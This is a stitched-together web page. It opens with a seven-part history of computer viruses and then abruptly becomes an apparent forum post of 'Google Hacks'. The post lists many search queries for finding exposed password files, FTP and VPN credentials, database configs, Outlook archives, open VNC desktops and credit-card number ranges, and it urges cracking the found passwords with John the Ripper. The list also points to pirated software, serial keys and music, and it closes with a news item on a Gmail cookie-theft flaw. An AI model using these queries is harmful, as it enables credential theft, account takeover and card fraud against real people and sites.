Going back to the origin of viruses, it was in 1949 that Mathematician John Von Neumann described self-replicating programs which could resemble computer viruses as they are known today. However, it was not until the 60s that we find the predecessor of current viruses. In that decade, a group of programmers developed a game called Core Wars, which could reproduce every time it was run, and even saturate the memory of other players’ computers. The creators of this peculiar game also created the first antivirus, an application named Reeper, which could destroy copies created by Core Wars.

However, it was only in 1983 that one of these programmers announced the existence of Core Wars, which was described the following year in a prestigious scientific magazine: this was actually the starting point of what we call computer viruses today.

At that time, a still young MS-DOS was starting to become the preeminent operating system worldwide. This was a system with great prospects, but still many deficiencies as well, which arose from software developments and the lack of many hardware elements known today. Even like this, this new operating system became the target of a virus in 1986: Brain, a malicious code created in Pakistan which infected boot sectors of disks so that their contents could not be accessed. That year also saw the birth of the first Trojan: an application called PC-Write.

Shortly after, virus writers realized that infecting files could be even more harmful to systems. In 1987, a virus called Suriv-02 appeared, which infected COM files and opened the door to the infamous viruses Jerusalem or Viernes 13. However, the worst was still to come: 1988 set the date when the “Morris worm” appeared, infecting 6,000 computers.

From that date up to 1995 the types of malicious codes that are known today started being developed: the first macro viruses appeared, polymorphic viruses … Some of these even triggered epidemics, such as MichaelAngelo. However, there was an event that changed the virus scenario worldwide: the massive use of the Internet and e-mail. Little by little, viruses started adapting to this new situation until the appearance, in 1999, of Melissa, the first malicious code to cause a worldwide epidemic, opening a new era for computer viruses.



part 2


This second installment of ‘The evolution of viruses’ will look at how malicious code used to spread before use of the Internet and e-mail became as commonplace as it is today, and the main objectives of the creators of those earlier viruses.
Until the worldwide web and e-mail were adopted as a standard means of communication the world over, the main mediums through which viruses spread were floppy disks, removable drives, CDs, etc., containing files that were already infected or with the virus code in an executable boot sector.

When a virus entered a system it could go memory resident, infecting other files as they were opened, or it could start to reproduce immediately, also infecting other files on the system. The virus code could also be triggered by a certain event, for example when the system clock reached a certain date or time. In this case, the virus creator would calculate the time necessary for the virus to spread and then set a date –often with some particular significance- for the virus to activate. In this way, the virus would have an incubation period during which it didn’t visibly affect computers, but just spread from one system to another waiting for ‘D-day’ to launch its payload. This incubation period would be vital to the virus successfully infecting as many computers as possible.

One classic example of a destructive virus that lay low before releasing its payload was CIH, also known as Chernobyl. The most damaging version of this malicious code activated on April 26, when it would try to overwrite the flash-BIOS, the memory which includes the code needed to control PC devices. This virus, which first appeared in June 1998, had a serious impact for over two years and still continues to infect computers today.

Because of the way in which they propagate, these viruses spread very slowly, especially in comparison to the speed of today’s malicious code. Towards the end of the Eighties, for example, the Friday 13th (or Jerusalem) virus needed a long time to actually spread and continued to infect computers for some years. In contrast, experts reckon that in January 2003, SQLSlammer took just ten minutes to cause global communication problems across the Internet.

Notoriety versus stealth

For the most part, in the past, the activation of a malicious code triggered a series of on screen messages or images, or caused sounds to be emitted to catch the user’s attention. Such was the case with the Ping Pong virus, which displayed a ball bouncing from one side of the screen to another. This kind of elaborate display was used by the creator of the virus to gain as much notoriety as possible. Nowadays however, the opposite is the norm, with virus authors trying to make malicious code as discreet as possible, infecting users’ systems without them noticing that anything is amiss.



pat 3


This third installment of ‘The evolution of viruses’ will look at how the Internet and e-mail changed the propagation techniques used by computer viruses.

Internet and e-mail revolutionized communications. However, as expected, virus creators didn’t take long to realize that along with this new means of communication, an excellent way of spreading their creations far and wide had also dawned. Therefore, they quickly changed their aim from infecting a few computers while drawing as much attention to themselves as possible, to damaging as many computers as possible, as quickly as possible. This change in strategy resulted in the first global virus epidemic, which was caused by the Melissa worm.

With the appearance of Melissa, the economic impact of a virus started to become an issue. As a result, users -above all companies- started to become seriously concerned about the consequences of viruses on the security of their computers. This is how users discovered antivirus programs, which started to be installed widely. However, this also brought about a new challenge for virus writers, how to slip past this protection and how to persuade users to run infected files.

The answer to which of these virus strategies was the most effective came in the form of a new worm: Love Letter, which used a simple but effective ruse that could be considered an early type of social engineering. This strategy involves inserting false messages that trick users into thinking that the message includes anything, except a virus. This worm’s bait was simple; it led users to believe that they had received a love letter.

This technique is still the most widely used. However, it is closely followed by another tactic that has been the center of attention lately: exploiting vulnerabilities in commonly used software. This strategy offers a range of possibilities depending on the security hole exploited. The first malicious code to use this method –and quite successfully- were the BubbleBoy and Kakworm worms. These worms exploited a vulnerability in Internet Explorer by inserting HTML code in the body of the e-mail message, which allowed them to run automatically, without needing the user to do a thing.

Vulnerabilities allow many different types of actions to be carried out. For example, they allow viruses to be dropped on computers directly from the Internet -such as the Blaster worm-. In fact, the effects of the virus depend on the vulnerability that the virus author tries to exploit.



part 4


In the early days of computers, there were relatively few PCs likely to contain “sensitive” information, such as credit card numbers or other financial data, and these were generally limited to large companies that had already incorporated computers into working processes.

In any event, information stored in computers was not likely to be compromised, unless the computer was connected to a network through which the information could be transmitted. Of course, there were exceptions to this and there were cases in which hackers perpetrated frauds using data stored in IT systems. However, this was achieved through typical hacking activities, with no viruses involved.

The advent of the Internet however caused virus creators to change their objectives, and, from that moment on, they tried to infect as many computers as possible in the shortest time. Also, the introduction of Internet services -like e-banking or online shopping- brought in another change. Some virus creators started writing malicious codes not to infect computers, but, to steal confidential data associated to those services. Evidently, to achieve this, they needed viruses that could infect many computers silently.

Their malicious labor was finally rewarded with the appearance, in 1986, of a new breed of malicious code generically called “Trojan Horse”, or simply “Trojan”. This first Trojan was called PC-Write and tried to pass itself off as the shareware version of a text processor. When run, the Trojan displayed a functional text processor on screen. The problem was that, while the user wrote, PC-Write deleted and corrupted files on the computers’ hard disk.

After PC-Write, this type of malicious code evolved very quickly to reach the stage of present-day Trojans. Today, many of the people who design Trojans to steal data cannot be considered virus writers but simply thieves who, instead of using blowtorches or dynamite have turned to viruses to commit their crimes. Ldpinch.W or the Bancos or Tolger families of Trojans are examples of this


part 5


Even though none of them can be left aside, some particular fields of computer science have played a more determinant role than others with regard to the evolution of viruses. One of the most influential fields has been the development of programming languages.

These languages are basically a means of communication with computers in order to tell them what to do. Even though each of them has its own specific development and formulation rules, computers in fact understand only one language called "machine code".

Programming languages act as an interpreter between the programmer and the computer. Obviously, the more directly you can communicate with the computer, the better it will understand you, and more complex actions you can ask it to perform.

According to this, programming languages can be divided into "low and high level" languages, depending on whether their syntax is more understandable for programmers or for computers. A "high level" language uses expressions that are easily understandable for most programmers, but not so much for computers. Visual Basic and C are good examples of this type of language.

On the contrary, expressions used by "low level" languages are closer to machine code, but are very difficult to understand for someone who has not been involved in the programming process. One of the most powerful, most widely used examples of this type of language is "assembler".

In order to explain the use of programming languages through virus history, it is necessary to refer to hardware evolution. It is not difficult to understand that an old 8-bit processor does not have the power of modern 64-bit processors, and this of course, has had an impact on the programming languages used.

In this and the next installments of this series, we will look at the different programming languages used by virus creators through computer history:

- Virus antecessors: Core Wars

As was already explained in the first chapter of this series, a group of programs called Core Wars, developed by engineers at an important telecommunications company, are considered the antecessors of current-day viruses. Computer science was still in the early stages and programming languages had hardly developed. For this reason, authors of these proto-viruses used a language that was almost equal to machine code to program them.

Curiously enough, it seems that one of the Core Wars programmers was Robert Thomas Morris, whose son programmed -years later- the "Morris worm". This malicious code became extraordinarily famous since it managed to infect 6,000 computers, an impressive figure for 1988.

- The new gurus of the 8-bits and the assembler language.

The names Altair, IMSAI and Apple in USA and Sinclair, Atari and Commodore in Europe, bring memories of times gone by, when a new generation of computer enthusiasts "fought" to establish their place in the programming world. To be the best, programmers needed to have profound knowledge of machine code and assembler, as interpreters of high-level languages used too much run time. BASIC, for example, was a relatively easy to learn language which allowed users to develop programs simply and quickly. It had however, many limitations.

This caused the appearance of two groups of programmers: those who used assembler and those who turned to high-level languages (BASIC and PASCAL, mainly).

Computer aficionados of the time enjoyed themselves more by programming useful software than malware. However, 1981 saw the birth of what can be considered the first 8-bit virus. Its name was "Elk Cloner", and was programmed in machine code. This virus could infect Apple II systems and displayed a message when it infected a computer.



part 6


Computer viruses evolve in much the same way as in other areas of IT. Two of the most important factors in understanding how viruses have reached their current level are the development of programming languages and the appearance of increasingly powerful hardware.

In 1981, almost at the same time as Elk Kloner (the first virus for 8-bit processors) made its appearance, a new operating system was growing in popularity. Its full name was Microsoft Disk Operating System, although computer buffs throughout the world would soon refer to it simply as DOS.

DOS viruses

The development of MS DOS systems occurred in parallel to the appearance of new, more powerful hardware. Personal computers were gradually establishing themselves as tools that people could use in their everyday lives, and the result was that the number of PCs users grew substantially. Perhaps inevitably, more users also started creating viruses. Gradually, we witnessed the appearance of the first viruses and Trojans for DOS, written in assembler language and demonstrating a degree of skill on the part of their authors.

Far less programmers know assembler language than are familiar with high-level languages that are far easier to learn. Malicious code written in Fortran, Basic, Cobol, C or Pascal soon began to appear. The last two languages, which are well established and very powerful, are the most widely used, particularly in their TurboC and Turbo Pascal versions. This ultimately led to the appearance of “virus families”: that is, viruses that are followed by a vast number of related viruses which are slightly modified forms of the original code.

Other users took the less ‘artistic’ approach of creating destructive viruses that did not require any great knowledge of programming. As a result, batch processing file viruses or BAT viruses began to appear.

Win16 viruses

The development of 16-bit processors led to a new era in computing. The first consequence was the birth of Windows, which, at the time, was just an application to make it easier to handle DOS using a graphic interface.

The structure of Windows 3.xx files is rather difficult to understand, and the assembler language code is very complicated, as a result of which few programmers initially attempted to develop viruses for this platform. But this problem was soon solved thanks to the development of programming tools for high-level languages, above all Visual Basic. This application is so effective that many virus creators adopted it as their ‘daily working tool’. This meant that writing a virus had become a very straightforward task, and viruses soon appeared in their hundreds. This development was accompanied by the appearance of the first Trojans able to steal passwords. As a result, more than 500 variants of the AOL Trojan family -designed to steal personal information from infected computers- were identified.

part 7

This seventh edition on the history of computer viruses will look at how the development of Windows and Visual Basic has influenced the evolution of viruses, as with the development of these, worldwide epidemics also evolved such as the first one caused by Melissa in 1999.

While Windows changed from being an application designed to make DOS easier to manage to a 32-bit platform and operating system in its own right, virus creators went back to using assembler as the main language for programming viruses.

Versions 5 and 6 of Visual Basic (VB) were developed, making it the preferred tool, along with Borland Delphi (the Pascal development for the Windows environment), for Trojan and worm writers. Then, Visual C, a powerful environment developed in C for Windows, was adopted for creating viruses, Trojans and worms. This last type of malware gained unusual strength, taking over almost all other types of viruses. Even though the characteristics of worms have changed over time, they all have the same objective: to spread to as many computers as possible, as quickly as possible.

With time, Visual Basic became extremely popular and Microsoft implemented part of the functionality of this language as an interpreter capable of running script files with a similar syntax.

At the same time as the Win32 platform was implemented, the first script viruses also appeared: malware inside a simple text file. These demonstrated that not only executable files (.EXE and .COM files) could carry viruses. As already seen with BAT viruses, there are also other means of propagation, proving the saying "anything that can be executed directly or through a interpreter can contain malware." To be specific, the first viruses that infected the macros included in Microsoft Office emerged. As a result, Word, Excel, Access and PowerPoint become ways of spreading ‘lethal weapons’, which destroyed information when the user simply opened a document.

Melissa and self-executing worms

The powerful script interpreters in Microsoft Office allowed virus authors to arm their creations with the characteristics of worms. A clear example is Melissa, a Word macro virus with the characteristics of a worm that infects Word 97 and 2000 documents. This worm automatically sends itself out as an attachment to an e-mail message to the first 50 contacts in the Outlook address book on the affected computer. This technique, which has unfortunately become very popular nowadays, was first used in this virus which, in 1999, caused one of the largest epidemics in computer history in just a few days. In fact, companies like Microsoft, Intel or Lucent Technologies had to block their connections to the Internet due to the actions of Melissa.

The technique started by Melissa was developed in 1999 by viruses like VBS/Freelink, which unlike its predecessor sent itself out to all the contacts in the address book on the infected PC. This started a new wave of worms capable of sending themselves out to all the contacts in the Outlook address book on the infected computer. Of these, the worm that most stands out from the rest is VBS/LoveLetter, more commonly known as ‘I love You’, which emerged in May 2000 and caused an epidemic that caused damage estimated at 10,000 million euros. In order to get the user’s attention and help it to spread, this worm sent itself out in an e-mail message with the subject ‘ILOVEYOU’ and an attached file called ‘LOVE-LETTER-FOR-YOU.TXT.VBS’. When the user opened this attachment, the computer was infected.

As well as Melissa, in 1999 another type of virus emerged that also marked a milestone in virus history. In November of that year, VBS/BubbleBoy appeared, a new type of Internet worm written in VB Script. VBS/BubbleBoy was automatically run without the user needing to click on an attached file, as it exploited a vulnerability in Internet Explorer 5 to automatically run when the message was opened or viewed. This worm was followed in 2000 by JS/Kak.Worm, which spread by hiding behind Java Script in the auto-signature in Microsoft Outlook Express, allowing it to infect computers without the user needing to run an attached file. These were the first samples of a series of worms, which were joined later on by worms capable of attacking computers when the user is browsing the Internet.

Master
29-04-07, 09:27
Excellent tricks and techniques of Google Hacks

ws_ftp.ini is a configuration file for a popular FTP client that stores usernames, (weakly) encoded passwords, sites and directories that the user can store for later reference. These should not be on the web!

That's some good stuff. Just copy/paste the text into your own WS FTP ini file and you're good as gold (assuming you're using the same version). Don't forget - even if they have taken the file offline, use the "cache:FULL_URL/wsftp.ini" to see the contents.
probably one of the best exploits I have seen in a long time, when I did it there were about 20 vulnerable computers, just recently there was 4 so I hope whitehats got to this before anyone else. really nice !!

To see results; just write in the (Only the registered members can see the link) search engine the code:

intitle:index.of ws_ftp.ini

==============================================

Frontpage.. very nice clean search results listing !! I magine with me that you can steal or know the password of any web site designed by "Frontpage". But the file containing the password might be encrypted; to decrypt the file download the program " john the ripper".

To see results; just write in the (Only the registered members can see the link) search engine the code:

"# -FrontPage-" inurl:service.pwd

==============================================

This searches the password for "Website Access Analyzer", a Japanese software that creates webstatistics.

To see results; just write in the (Only the registered members can see the link) search engine the code:

"AutoCreate=TRUE password=*"

==============================================

This is a query to get inline passwords from search engines (not just Google), you must type in the query followed with the the domain name without the .com or .net.

To see results; just write in the (Only the registered members can see the link) search engine the code:

"Only the registered members can see the link*:*@www" bangbus or "Only the registered members can see the link*:*@www"bangbus

Or

Only the registered members can see the link@www

Or

Only the registered members can see the link*@www

==============================================






This search is a cleanup of a previous entry by J0hnny. It uses "parent directory" to avoid results other than directory listings.

WS_FTP.ini is a configuration file for a popular win32 FTP client that stores usernames and weakly encoded passwords.

To see results; just write in the (Only the registered members can see the link) search engine the code:

filetype:ini ws_ftp pwd

Or

"index of/" "ws_ftp.ini" "parent directory"

==============================================

Microsoft Frontpage extensions appear on virtually every type of scanner. In the late 90's people thought they where hardcore by defacing sites with Frontpage. Today, there are still vulnerable servers found with Google.

An attacker can simply take advantage from administrators who 'forget' to set up the policies for Frontpage extensions. An attacker can also search for 'filetype:pwd users'.

To see results; just write in the (Only the registered members can see the link) search engine the code:

filetype:pwd service

==============================================


Not all of these pages are administrator's access databases containing usernames, passwords and other sensitive information, but many are! And much adminstrated passwords and user passwords, a lot of emails and the such too…

To see results; just write in the (Only the registered members can see the link) search engine the code:

allinurl: admin mdb

==============================================

DCForum's password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program(!!!). Some lists are bigger than others, all are fun.

To see results; just write in the (Only the registered members can see the link) search engine the code:

allinurl:auth_user_file.txt

==============================================

This search brings up sites with "config.php" files. To skip the technical discussion, this configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database. To see view the PHP files; there in lies the catch. Browsers are made to process the commands of PHP before display, so if no commands, nothing to show. You can't use that persay to get into the config file, but it would show potential threats if someone got into server anyway. (If that happens you're basically boned anyway, not much around that.

To see results; just write in the (Only the registered members can see the link) search engine the code:

intitle:index.of config.php

By the way, to know how to view the PHP file contents, you can use this code:

intitle:"Index of" phpinfo.php

==============================================

These files contain ColdFusion source code. In some cases, the pages are examples that are found in discussion forums. However, in many cases these pages contain live sourcecode with usernames, database names or passwords in plaintext.

To see results; just write in the (Only the registered members can see the link) search engine the code:

filetype:cfm "cfapplication name" password

==============================================

FlashFXP offers the easiest and fastest way to transfer any file using FTP, providing an exceptionally stable and robust program that you can always count on to get your job done quickly and efficiently. There are many, many features available in FlashFXP.

The flashFXP.ini file is its configuration file and may contain usernames/passwords and everything else that is needed to use FTP.

To see results; just write in the (Only the registered members can see the link) search engine the code:

filetype:ini inurl:flashFXP.ini

==============================================

The encryption method used in WS_FTP is _extremely_ weak. These files can be found with the "index of" keyword or by searching directly for the PWD= value inside the configuration file.

There is an easy way to decrypt the hash, use the decryptor at:


Only the registered members can see the link

Or

Only the registered members can see the link

To see results; just write in the (Only the registered members can see the link) search engine the code:

filetype:ini ws_ftp pwd

==============================================

These files contain cleartext usernames and passwords, as well as the sites associated with those credentials. Attackers can use this information to log on to that site as that user.
To see results; just write in the (Only the registered members can see the link) search engine the code:

filetype:log inurl:"password.log"
==============================================

Web Wiz Forums is a free ASP Bulletin Board software package. It uses a Microsoft Access database for storage. The installation instructions clearly indicate to change the default path and filename (admin/database/wwForum.mdb).
vendor: Only the registered members can see the link

The forum database contains the members passwords, either encrypted or in plain text, depending on the version.

Please note: this search is proof that results can stay in Google's index for a long time, even when they are not on the site any longer. Currently only 2 out of 9 are actually still downloadable by an attacker.

To see results; just write in the (Only the registered members can see the link) search engine the code:

filetype:mdb wwforum

==============================================

VNC is a remote-controlled desktop product. Depending on the configuration, remote users may not be presented with a password. Even when presented with a password, the mere existance of VNC can be important to an attacker, as is the open port of 5800.

To see results; just write in the (Only the registered members can see the link) search engine the code:

"VNC Desktop" inurl:5800



By the way, New version of VNC changed title to VNC Viewer so now you can search for…

intitle:vnc.desktop inurl:5800

==============================================

linux vpns store their usernames and passwords for CHAP authentification in a file called "chap-secrets" where the usernames and the passwords are in cleartext.

To see results; just write in the (Only the registered members can see the link) search engine the code:

inurl:chap-secrets -cvs

==============================================

These lock files often contain usernames of the user that has locked the file. Username harvesting can be done using this technique.

To see results; just write in the (Only the registered members can see the link) search engine the code:

"index of" / lck

==============================================

A standard FTP configuration file that provides far too many details about how the server is setup, including installation paths, location of logfiles, generic username and associated group, etc.

To see results; just write in the (Only the registered members can see the link) search engine the code:

filetype:conf inurl:proftpd.conf -sample

==============================================

This search finds registry files from the Windows Operating system. Considered the "soul" of the system, these files, and snippets from these files contain sensitive information, in this case usernames and/or passwords.

To see results; just write in the (Only the registered members can see the link) search engine the code:

filetype:reg reg HKEY_CURRENT_USER username

==============================================

Allows an attacker to create an account on a server running Argosoft mail server pro for windows with unlimited disk quota (but a 5mb per message limit should you use your account to send mail).

To see results; just write in the (Only the registered members can see the link) search engine the code:

"adding new user" inurl:addnewuser -"there are no domains"

==============================================

The famous Sun linux appliance. The default page displays this text:

"Congratulations on Choosing a Cobalt RaQ - the premier server appliance platform for web hosting. This page can easily be replaced with your own page. To replace this page, transfer your new content to the directory /home/sites/home/web".

To see results; just write in the (Only the registered members can see the link) search engine the code:

(inurl:81/cgi-bin/.cobalt/) | (intext:"Welcome to the Cobalt RaQ")

==============================================

WS_FTP.LOG can be used in many ways to find more information about a server. This query is very flexible, just substitute "+htpasswd" for "+FILENAME" and you may get several hits that you hadn't seen with the 'normal' search.

Filenames suggested by the forum to explore are: phpinfo, admin, MySQL, password, htdocs, root, Cisco, Oracle, IIS, resume, inc, sql, users, mdb, frontpage, CMS, backend, Only the registered members can see the link editor, intranet . The list goes on and on..

A different approach might be "allinurl: "some.host.com" WS_FTP.LOG filetype:log" which tells you more about who's uploading files to a specific site.

To see results; just write in the (Only the registered members can see the link) search engine the code:

+htpasswd +WS_FTP.LOG filetype:log

==============================================

The Web Data Administrator is a utility program implemented in ASP.NET that enables you to easily manage your SQL Server data wherever you are. Using its built-in features, you can do the following from Internet Explorer or your favorite Web browser.
Create and edit databases in Microsoft SQL Server 2000 or Microsoft SQL Server 2000 Desktop Engine (MSDE) Perform ad-hoc queries against databases and save them to your file system Export and import database schema and data.

To see results; just write in the (Only the registered members can see the link) search engine the code:

intitle:"Web Data Administrator - Login"

==============================================

The Aanval Intrusion Detection Console is an advanced intrusion detection monitor and alerting system. Currently supporting modules for Snort and syslog - Aanval provides real-time monitoring, reporting, alerting and stability. Aanval's web-browser interface provides real-time event viewing and system/sensor management.

To see results; just write in the (Only the registered members can see the link) search engine the code:

intitle:"remote assessment" OpenAanval Console

==============================================

Google is so smart, it’s scary sometimes. I has found another interesting (to say the least) Google use.
I just ran across a pretty scary new google trick. It seems they have just recently added number span searching to their engine. Take a look at this example:

To see results; just write in the (Only the registered members can see the link) search engine the code:

visa 4356000000000000..4356999999999999

Basically, what this search does is search for the word “visa” [credit card] with any numbers that fit within your query. i.e. any Visa credit card number with the first four digits 4356.
As you can see, Google has searched the entire range against its DB. Within minutes I found some crazy sites like this one. Now please know that Google didn’t create this tool to be used like this. It’s actually quite handy when used correctly. Just an FYI for all of you.

==============================================

Tired of websearching ? Want something to read ? You can find Ebooks (thousands of them) with this search..LIT files can be opened with Microsoft Reader (Only the registered members can see the link).

To see results; just write in the (Only the registered members can see the link) search engine the code:

filetype:lit lit (books|ebooks)

==============================================

Using Google, and some finely crafted searches we can find a lot of interesting information.

For Example we can find: Credit Card Numbers / Passwords / Software / MP3's
...... (and on and on and on)Presented below is just a sample of interesting searches that we can send to google to obtain info that some people might not want us having.. After you get a taste using some of these, try your own crafted searches to find info that you would be interested in.
To see results; just write in the (Only the registered members can see the link) search engine the code:

intitle:"Index of" passwords modified

And

allinurl:auth_user_file.txt

And

"access denied for user" "using password"
And

"A syntax error has occurred" filetype:ihtml
And

allinurl: admin mdb
And

"ORA-00921: unexpected end of SQL command"
And

inurl:passlist.txt
And

"Index of /backup"
And

"Chatologica MetaSearch" "stack tracking:"
And

Amex Numbers: 300000000000000..399999999999999

And

MC Numbers: 5178000000000000..5178999999999999

And

visa 4356000000000000..4356999999999999

==============================================

Notice I am only changing the word after the parent directory, change it to what you want and you will get a lot of stuff.

To see results; just write in the (Only the registered members can see the link) search engine the code:

"parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

And

"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

And

"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

And

"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

And
"parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

And

"parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

Or

?intitle:index.of? mp3

You only need add the name of the song/artist/singer.
Example: ?intitle:index.of? mp3 jackson
==============================================

You can change the string to watever you want, ex. microsoft to adobe, iso to zip etc…

To see results; just write in the (Only the registered members can see the link) search engine the code:

inurl:microsoft filetype:iso

==============================================

This search reveals channel keys (passwords) on IRC as revealed from IRC chat logs.

To see results; just write in the (Only the registered members can see the link) search engine the code:

"sets mode: +k"
==============================================
These are eggdrop config files. Avoiding a full-blown descussion about eggdrops and IRC bots, suffice it to say that this file contains usernames and passwords for IRC users.

To see results; just write in the (Only the registered members can see the link) search engine the code:

eggdrop filetype:user user

==============================================

This will search for backup files (*.bak) created by some editors or even by the administrator himself (before activating a new version).

Every attacker knows that changing the extenstion of a file on a webserver can have ugly consequences.

see results; just write in the (Only the registered members can see the link) search engine the code:

filetype:bak inurl:"htaccess|passwd|shadow|htusers"

==============================================

Let's pretend you need a serial number for windows xp pro. The key is the 94FBR code.. it was included with many MS Office registration codes so this will help you dramatically reduce the amount of 'fake' porn sites that trick you.
To see results; just write in the (Only the registered members can see the link) search engine the code:

"Windows XP Professional" 94FBR

By the way, don't forget to change "Window sXP Professional" to any product you need its serial number.

==============================================

Notice this excellent trick. You can search for any product whether hardware or software (between any prices price: for example, $250.. $350 ).

To see results; just write in the (Only the registered members can see the link) search engine the code:

DVD player $250..350

By the way, don't forget to change "DVD player" to any product you need to search for.

==============================================

At first glance, this search reveals even more examples of operating system users enabling the operating system default web server software. This is generally accepted to be a Bad Idea(TM) as mentioned in the previous example. However, the googleDork index on this particular category gets quite a boost from the fact that this particular screen should NEVER be seen by the general public. To quote the default index screen: "Any users attempting to connect to this site are currently receiving an 'Under Construction page'" THIS is not the 'Under Construction page.' I was only able to generate this screen while sitting at the console of the server. The fact that this screen is revealed to the general public may indicate a misconfiguration of a much more insidious nature...


To see results; just write in the (Only the registered members can see the link) search engine the code:

intitle:"Welcome to Windows 2000 Internet Services"

==============================================

Suppose you want a certain song to a singer and you can not find it; by this trick you can find the song in the original directory of the original web site.

To see results; just write in the (Only the registered members can see the link) search engine the code:

"index of/" "Top Gun" .mp3

By the way, don't forget to change "Top Gun" to any song you need to search for.

==============================================

This is a fabulous link. This is the secret link of the web site "Google" to search for any "Crack" you need.

Just write the following link in the address bar:

Only the registered members can see the link

==============================================

By the way, for anyone who needs to have an account in the google mail for "One GigaByte", go to the following address bar. You will receive within "36 hours" the confirmation mail for your registration:

Only the registered members can see the link

Or from:

Only the registered members can see the link

By the way, you can open your Google mail from your browser through this link:

Only the registered members can see the link

==============================================

Imagine that when you enter any web site, and you are surprised that when searching for any program in it you can not find it. By this fabulous trick, you can find the link for downloading any program in this site through any search engine.

For example, suppose you want to search for the program "Norton" in the web site Only the registered members can see the link ; when you go to Only the registered members can see the link and write the following code, you will be surprised that the "Google" search engine searches only in the site Only the registered members can see the link To do this:

Write in the address bar of the web browser this address: Only the registered members can see the link
When opening the web site; write in the search engine this code: "norton site: Only the registered members can see the link", and press the button search or "أبحث".
As mentioned earlier: the code is easy, you just write in the place of the word "Norton"; any word you need to search for in the site followed in the code.
The code again is....
norton site:Only the registered members can see the link

By the way, you can practice this code at any search engine.

Another trick is that you can force the search engine of the "Google" web site to search for a certain category like "Linux" topics. When you add any category after the Google link and write any thing in the search engine, you will surprised that the site searched for Linux only. For example, if you wrote the following code:
Only the registered members can see the link
As I mentioned in the code earlier, the site followed by the word "Linux". So the web site is forced for searching for the Linux topics only all over the internet.
==============================================
Imagine that you can connect to another computer remotely through the internet from the feature called "Remote Desktop Web Connection".
To see results; just write in the (Only the registered members can see the link) search engine the code:

intitle:"Remote Desktop Web Connection"

==============================================

Through this query you can find every web page "Google" has crawled for a specific site.

To see results; just write in the (Only the registered members can see the link) search engine the code:

Site: Microsoft.com

==============================================
Through this query, you can see web servers with default pages can serve as juicy targets.

To see results; just write in the (Only the registered members can see the link) search engine the code:

Intitle:test.page.for.apache "it worked"

==============================================

No one can deny that the directory listings can be a source of great information.

To see results; just write in the (Only the registered members can see the link) search engine the code:

Intitle:index.of/admin

==============================================

We will use this query to locate additional servers, subtract common hostnames from the query.

To see results; just write in the (Only the registered members can see the link) search engine the code:

Site: Microsoft.com - Site:Only the registered members can see the link

==============================================

From this query you can get huge user names and passwords from huge sites for free.

To see results; just write in the (Only the registered members can see the link) search engine the code:

"Welcome to *" "Your password is *"

==============================================

From this query you can collect many numbers of ".PST" files, which contain all E-mail folders, addresses or anything else that Outlook 97, 2000, xp or 2003 collects.

To see results; just write in the (Only the registered members can see the link) search engine the code:

outlook filetype:pst

==============================================

allinurl:gmail.google.com

"NetLife" Exclusive: Security hole found in "Gmail"
An Israeli hacker reveals: A security hole in "Gmail" allows the compromise of users' email boxes – without the need of a password Nitzan Weidenfeld, Nana NetLife Magazine.

So you’ve got a "Gmail" mail account? Or maybe you’ve just received an invitation? Well, we have some bad news for you: Your mail box is exposed. A major security hole in Google's mail service, allows full access to user accounts, without the need of a password.

"Everything could get publicly exposed – your received mails might be readable, as well as all of your sent mail, and furthermore – anyone could send and receive mail under your name", thus reveals Nir Goldshlagger, an Israeli hacker, on an exclusive interview with "Nana NetLife" Magazine. "Even more alarming", he explains, "is the fact that the hack itself is quite simple. All that is needed of the malicious hacker, beside knowledge of the specific technique, is quite basic computer knowledge, the victim's username – and that’s it, he's inside".

When approached, Google admitted to the security flaw. Google also assured us that this matter is being resolved, and that "the company will go to any length to protect its users".

The flaw which was discovered by Goldshlagger and was tested many times by Nana's editorial board had shown an alarming success rate. In order not to further jeopardize mail boxes' owners, we will only disclose that the process is based upon a security breach in the service's identity authentication. It allows the hacker to "snatch" the victims cookie file (a file planted in the victim's computer used to identify him) using a seemingly innocent link (which directs to Gmail's site itself). Once stolen, this cookie file allows the hacker to identify himself as the victim, without the need of a password. Even if the victim does change his password afterwards, it will be to no avail. "The system authenticates the hacker as the victim, using the stolen cookie file. Thus no password is involved in the authentication process. The victim can change his password as many times as he pleases, and it still won't stop the hacker from using his box", explains Goldshlagger.

Whether hackers have already used this method to compromise users' accounts is unclear at the moment.

Matters are several times worse when it comes to a service such as "Gmail". Besides the obvious blow to Google's seemingly spotless image, we're looking here at a major threat to anyone who has turned to "Gmail" as his major email box. "Because "Gmail" offers a gigabyte of storage, several times bigger than most other web based mail services, users hardly delete any old correspondence", says Goldshlagger. "The result is a huge amount of mail accumulating in the users' boxes, which frequently include bank notices, passwords, private documents and other files the user wanted to backup. Who ever takes a hold of this data, could literally take over the victim's life and identity".

"Ofer Elzam", a security expert for "Aladdin", who examined the security hole at "Nana's Netlife" request, explains: "This is a major threat, for the following reasons: First – the users have no way of protecting themselves. Second – it's quite easy to carry out, and third – it allows identity theft, which is nothing less than a serious danger to the victim".

"On the bright side", he adds, "its a good thing that this hole was found now, before the service was officially announced and offered to millions of users world-wide. I reckon it's just a matter of time before an automatic tool is made, which would allow even the less computer-savvy people to exploit this hack. The damage, needless to say, could be huge"

Is there a way, after all, to protect ourselves in the face of this danger? Elzam does not bear good news on the matter. "The only immediate solution that comes to mind is not using "Gmail" to store any messages or files that might be maliciously used. At least until Google attends to this problem".

I received a weird email last week and I forwarded it to the bug report. Guess that was the cookie link I talked about. I put it here:







From: accounts-noreply@google.com <accounts-noreply@google.com>
To: xxxx@xxxx
Date: Tue, 26 Oct 2004 08:22:16 -0700 (PDT)
Subject: Google Password Assistance
Reply | Reply to all | Forward | Print | Add sender to contacts list | Trash this message | Show original

To initiate the process for resetting the password for your
xxxxx@gmail.com Google Account, visit the link below

Only the registered members can see the link

Thank you for using Google.

For questions or concerns regarding your account, please send mail to
accounts-support@google.com.

This is a post-only mailing. Replies to this message are not monitored
or answered.


And this is the explanation to what mentioned earlier:

Last Monday reported that a vulnerability in "GSuite". A local user can obtain the target user's "GMail" password.

